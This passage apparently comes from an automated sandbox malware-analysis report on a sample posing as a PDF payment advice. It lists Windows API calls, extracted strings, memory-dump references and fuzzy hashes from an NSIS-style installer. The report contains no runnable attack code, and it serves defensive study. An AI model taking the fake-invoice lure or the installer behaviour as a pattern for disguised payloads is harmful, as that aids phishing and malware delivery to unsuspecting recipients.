                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: {
                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                    • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                    • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                    • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                    • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                    • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                    • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 184305955-0
                                                                                                                                    • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                    • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                    • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                    • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                    • String ID: -B@$N$open
                                                                                                                                    • API String ID: 3615053054-1057335957
                                                                                                                                    • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                    • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                                    • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                                    • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                    • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 1975747703-1115850852
                                                                                                                                    • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                    • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                    • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                    • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                    • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                    APIs
                                                                                                                                    • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                    • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                    • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                    • API String ID: 222337774-899692902
                                                                                                                                    • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                    • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                    • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                    • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                    • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                    • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                      • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                      • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                      • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                      • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                      • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A
                                                                                                                                    • API String ID: 2624150263-3554254475
                                                                                                                                    • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                    • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                    • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                    • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                    Strings
                                                                                                                                    • (*B, xrefs: 00402E7C
                                                                                                                                    • Null, xrefs: 00402EE5
                                                                                                                                    • soft, xrefs: 00402EDC
                                                                                                                                    • Inst, xrefs: 00402ED3
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                                    • Error launching installer, xrefs: 00402E3E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                    • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 4283519449-2478819026
                                                                                                                                    • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                    • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                    • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                    • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                    • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                    • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                                    Strings
                                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 900638850-730719616
                                                                                                                                    • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                    • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                    • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                    • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: jA$ jA$... %d%%
                                                                                                                                    • API String ID: 551687249-2167919867
                                                                                                                                    • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                    • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                    • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                    • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                    • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
